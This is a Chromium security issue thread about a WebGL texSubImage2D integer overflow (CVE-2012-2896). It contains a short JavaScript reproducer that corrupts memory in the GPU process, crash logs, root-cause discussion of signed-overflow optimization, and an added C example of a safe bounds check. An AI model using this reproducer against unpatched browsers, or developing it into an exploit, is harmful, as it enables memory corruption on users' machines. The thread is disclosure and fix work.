Issue metadata

Status: Fixed
Last visit 17 days ago
Closed: Dec 2012
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security


Issue 145544: Security: integer overflow in gpu process with webgl

Reported by, Aug 29 2012

Issue description

integer overflow in gpu process with webgl

this might be an asan bug.

chromium and chrome say:
[] .WebGLRenderingContext: GL ERROR :GL_INVALID_VALUE : glTexSubImage2D: bad dimensions.

Chrome Version: dev
Operating System: linux 64bit

      var gl = document.createElement("canvas").getContext('experimental-webgl')
      var texture = gl.createTexture()
      gl.bindTexture(gl.TEXTURE_2D, texture)
      gl.texImage2D(gl.TEXTURE_2D, 0, gl.RGBA, 256, 256, 0, gl.RGBA, gl.UNSIGNED_BYTE, null)
      gl.texSubImage2D(gl.TEXTURE_2D, 0, 0, 0x7fffff00, 256, 256, gl.RGBA, gl.UNSIGNED_BYTE, new Uint8Array(256 * 256 * 4))

same problem with the large number in the x position.

Type of crash: asan + gpu
Crash State: 

==2978== ERROR: AddressSanitizer unknown-crash on address 0x8000e033f080 at pc 0x55555f2a4310 bp 0x7fffffff7550 sp 0x7fffffff7308
READ of size 1 at 0x8000e033f080 thread T0
    #0 0x55555f2a430f in __interceptor_memcpy ??:0
    #1 0x7fffe95934c6 in ?? ??:0
==2978== AddressSanitizer CHECK failed: /usr/local/google/chrome/src/third_party/llvm/projects/compiler-rt/lib/asan/ "((0 && "Address is not in memory and not in shadow?")) != (0)" (0x0, 0x0)
    #0 0x55555f2a923e in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) ??:0
    #1 0x55555f2a83a9 in __asan::DescribeAddressIfShadow(unsigned long) ??:0

Comment 1 by, Aug 30 2012

Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit Feature-GPU-WebGL OS-All Mstone-22 SecSeverity-High SecImpacts-Stable SecImpacts-Beta

Comment 2 by, Aug 30 2012

@kcc: ASAN bug or real?

Comment 3 by, Aug 31 2012

All I see now is a null deref, and asan is unable to unwind through it.

Comment 4 by, Aug 31 2012

Status: Assigned
The NULL deref is reproducible for me under Chrome built with just Clang (without ASan):

Here's the crashing thread stack:

0x7f12a3cc6fc1	 []	 + 0x00086fc1]	
0x7f129d6a06f5	 []	 + 0x010266f5]	
0x7f129d6aa7d9	 []	 + 0x010307d9]	
0x7f129d6a069f	 []	 + 0x0102669f]	
0x7f129d7afbcd	 []	 + 0x01135bcd]	
0x7f129d7a4bfa	 []	 + 0x0112abfa]	
0x7f1299db60f7	 [ (deleted)]	 + 0x000100f7]	
0x7f1299db60f7	 [ (deleted)]	 + 0x000100f7]	
0x7f1299db60f7	 [ (deleted)]	 + 0x000100f7]

Comment 5 by, Aug 31 2012

Ken is on vacation.  I'll take a look.

Comment 6 by, Sep 6 2012

Labels: ReleaseBlock-Stable

Comment 7 by, Sep 6 2012

Status: Started

Comment 8 by, Sep 6 2012

works on intel

==7710== ERROR: AddressSanitizer crashed on unknown address 0x7fffe31a5000 (pc 0x7fffe9a5afc2 sp 0x7fffffff74a0 bp 0x000000000400 T0)
AddressSanitizer can not provide additional info.
    #0 0x7fffe9a5afc2 (/usr/lib/x86_64-linux-gnu/dri/
Stats: 37M malloced (35M for red zones) by 50451 calls

Comment 9 by, Sep 7 2012

This was a bug in the overflow math code

There's a CL here that fixes it

Comment 11 by, Sep 7 2012

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased
miaubiz, can you try on trunk to see if it fixes it for you?

Comment 12 by, Sep 8 2012

fixed in 155560 for me

Comment 13 by, Sep 8 2012

Labels: reward-topanel
@miaubiz: thanks. I'll get it merged for the upcoming Chrome 22 release.

We actually tracked this to a legitimate modern compiler optimization on tricky code. I wonder if other release compiles are affected? Win, Linux, ... if so, might be fun to try and read the OOB texture values via JS ;-) Rewards panel now loves that sort of thing.

Comment 14 by, Sep 10 2012

@scarybeasts: can you please elaborate on what you mean by the legitimate modern compiler optimization, and on how to proceed with checking more stuff?

Comment 15 by, Sep 10 2012

@miaubiz: the problem is "signed arithmetic overflow behaviour" -- which is specifically undefined in the C standard. We had some code relying on it. Modern compilers will perform optimizations that break such code.

So, the clang / ASAN compiler you used to find this bug definitely has the optimization!

But what about Windows / MSVC? Does your test case reproduce on Windows?
How about a standard Linux build? That is compiled with GCC.

I think it'd be interesting, that's all :D
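Comment 15 names the root cause as a bounds check that relied on signed arithmetic overflow. The following C block is an added illustration, not Chromium's code and not the CL referenced in comment 9: it contrasts a check of the shape `xoffset + width <= texture_width`, whose wrap-around is modelled explicitly so the result is deterministic, with a rewrite that compares against the remaining room and can never overflow. Function names, the two's-complement wrap model and the sample call are assumptions; the offset value comes from the test case in the issue description.

```c
#include <limits.h>
#include <stdbool.h>
#include <stdio.h>

/* Added example (not Chromium code). Models the 2D sub-image bounds check
 * a glTexSubImage2D validator needs: the update rectangle (xoff, yoff, w, h)
 * must lie inside the allocated level (tex_w x tex_h). All values are GLint,
 * i.e. signed 32-bit int, as in the GL API. */

/* Signed overflow is undefined in C, so instead of computing xoff + w in int
 * the wrap is modelled here in 64-bit arithmetic (two's-complement wrap is an
 * assumption). A real optimising build may instead delete the comparison
 * entirely, as comment 15 describes; either way the check is unsound. */
static long long wrap32(long long v) {
    while (v > INT_MAX) v -= 4294967296LL;
    while (v < INT_MIN) v += 4294967296LL;
    return v;
}

/* The flawed shape: "xoff + w <= tex_w" with the sum allowed to wrap. */
bool naive_in_bounds(int tex_w, int tex_h, int xoff, int yoff, int w, int h) {
    if (xoff < 0 || yoff < 0 || w < 0 || h < 0) return false;
    long long xend = wrap32((long long)xoff + w);  /* may have wrapped negative */
    long long yend = wrap32((long long)yoff + h);
    return xend <= tex_w && yend <= tex_h;
}

/* Overflow-free rewrite: reject negatives first, then compare the requested
 * size against the remaining room (tex_w - xoff). Once both operands are
 * known to be non-negative ints and xoff <= tex_w, that subtraction cannot
 * overflow and no addition is needed at all. */
bool safe_in_bounds(int tex_w, int tex_h, int xoff, int yoff, int w, int h) {
    if (tex_w < 0 || tex_h < 0) return false;
    if (xoff < 0 || yoff < 0 || w < 0 || h < 0) return false;
    if (xoff > tex_w || yoff > tex_h) return false;   /* keeps tex_w - xoff >= 0 */
    return w <= tex_w - xoff && h <= tex_h - yoff;
}

int main(void) {
    /* Arguments from the test case in the issue description: a 256x256
     * texture, update placed at x offset 0x7fffff00, 256x256 in size. */
    int xoff = 0x7fffff00;
    printf("naive check accepts: %d\n", naive_in_bounds(256, 256, xoff, 0, 256, 256));
    printf("safe check accepts:  %d\n", safe_in_bounds(256, 256, xoff, 0, 256, 256));
    printf("safe check accepts a full-size update at the origin: %d\n",
           safe_in_bounds(256, 256, 0, 0, 256, 256));
    return 0;
}
```

With the issue's offset, 0x7fffff00 + 256 wraps to INT_MIN, which compares as less than 256, so the naive form accepts an update whose start lies far outside the texture; the rewrite rejects it because 256 exceeds the room left after that offset. The same reasoning applies to the y offset, which the reporter notes triggers the identical problem.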

Comment 16 by, Sep 10 2012

I see.

/Applications/Google\\ Chrome --gpu-launcher="env CW_CURRENT_CASE=scarybeasts $HOME/crashwrangler/exc_handler" --incognito --disable-breakpad scarybeasts.html

Crashed thread log = 
: CrGpuMain  Dispatch queue:
0   libsystem_c.dylib             	0x951baa37 memmove$VARIANT$sse42 + 218
1   libGLImage.dylib              	0x98933e64 glgCopyRowsWithMemCopy(GLGOperationRec const*, unsigned long, GLDPixelModeRec const*) + 106
2   libGLImage.dylib              	0x98932823 glgProcessPixelsWithProcessor + 991
3   GLEngine                      	0x05f1d1aa gleTextureImagePut + 1167
4   GLEngine                      	0x05dc56fe glTexSubImage2D_Exec + 1882
5   libGL.dylib                   	0x92068546 glTexSubImage2D + 87
6   	0x02679fe8 ChromeMain + 39718232

exception=EXC_BAD_ACCESS:signal=11:is_exploitable=yes:instruction_disassembly=movdqa	%xmm0,(%edi,%edx):instruction_address=0x00000000951baa37:access_type=write:access_address=0x0000000007c0f000:

Comment 17 by, Sep 10 2012

meanwhile on Safari, requires manually setting 'Enable WebGL' tho.

Thread 0 Crashed:: Dispatch queue:
0   libsystem_c.dylib                   0x00007fff89385aa7 memmove$VARIANT$sse42 + 159
1   libGLImage.dylib                    0x00007fff86dc2acc glgCopyRowsWithMemCopy(GLGOperationRec const*, unsigned long, GLDPixelModeRec const*) + 129
2   libGLImage.dylib                    0x00007fff86dc1644 glgProcessPixelsWithProcessor + 885
3   GLEngine                            0x0000000150e6cf6d gleTextureImagePut + 1264
4   GLEngine                            0x0000000150d1bb7b glTexSubImage2D_Exec + 1720
5   libGL.dylib                         0x00007fff8e05d28a glTexSubImage2D + 77
6                   0x00007fff8506c583 WebCore::GraphicsContext3D::texSubImage2D(unsigned int, int, int, int, int, int, unsigned int, unsigned int, void const*) + 83
7                   0x00007fff858d83ea WebCore::WebGLRenderingContext::texSubImage2D(unsigned int, int, int, int, int, int, unsigned int, unsigned int, WTF::ArrayBufferView*, int&) + 426
8                   0x00007fff850599b2 WebCore::jsWebGLRenderingContextPrototypeFunctionTexSubImage2D(JSC::ExecState*) + 1602

Path:            /System/Library/PrivateFrameworks/WebKit2.framework/
Version:         8536 (8536.25)
OS Version:      Mac OS X 10.8.1 (12B19)

Comment 18 by, Sep 10 2012

Nice. GCC on Mac clearly affected.

Comment 19 by, Sep 10 2012

I thought we use Clang on Mac, not gcc

Comment 20 by, Sep 10 2012

Oh, possibly my bad. XCode switched to clang?

Comment 21 by, Sep 11 2012

>> XCode switched to clang?
Yep. (Long ago, I think)

Comment 22 by, Sep 11 2012

yeah. apple ditched gcc a while back.

osx has no gpu sandbox right?

Comment 23 by, Sep 11 2012

I think it does: content/common/

Comment 24 by, Sep 17 2012

Labels: -Merge-Approved Merge-Merged

Comment 26 by, Sep 25 2012

Labels: -reward-topanel reward-1000 reward-unpaid
@miaubiz: nice job for starting fuzzing on your Mac. Seems to be a new source of revenue :D

Comment 27 by, Sep 27 2012

@scarybeasts: it says [Mac only] [$1000] [145544] High CVE-2012-2896: Integer overflow in WebGL. Credit to miaubiz.

this was on linux too (including intel), see c#0 and c#8

Comment 28 by, Sep 27 2012

I think you were seeing it on Linux because ASAN builds use the Clang compiler.
Production Linux builds use GCC. GCC has been known to apply the same optimization but I don't see any crash logs against production builds? So hard to say :)

Comment 29 by, Oct 11 2012

Labels: -reward-unpaid

Comment 30 by, Dec 20 2012

Status: Fixed

Comment 31 by, Mar 10 2013

Project Member
Labels: -Type-Security -Area-WebKit -Feature-GPU-WebGL -Mstone-22 -SecSeverity-High -SecImpacts-Stable -SecImpacts-Beta Cr-Content Cr-Internals-GPU-WebGL Security-Impact-Stable Security-Impact-Beta M-22 Security-Severity-High Type-Bug-Security

Comment 32 by, Mar 21 2013

Labels: -Restrict-View-SecurityNotify

Comment 33 by, Mar 21 2013

Project Member
Labels: -Security-Severity-High Security_Severity-High

Comment 34 by, Mar 21 2013

Project Member
Labels: -Security-Impact-Stable Security_Impact-Stable

Comment 35 by, Mar 21 2013

Project Member
Labels: -Security-Impact-Beta Security_Impact-Beta

Comment 36 by, Apr 6 2013

Project Member
Labels: -Cr-Content Cr-Blink

Comment 37 by, Apr 10 2013

Project Member
Labels: -Cr-Internals-GPU-WebGL Cr-Blink-WebGL

Comment 38 by, Jun 14 2016

Project Member
Labels: -security_impact-beta

Comment 39 by, Oct 1 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit - Your friendly Sheriffbot

Comment 40 by, Oct 2 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit - Your friendly Sheriffbot

Comment 41 by, Oct 2 2016

Labels: allpublic
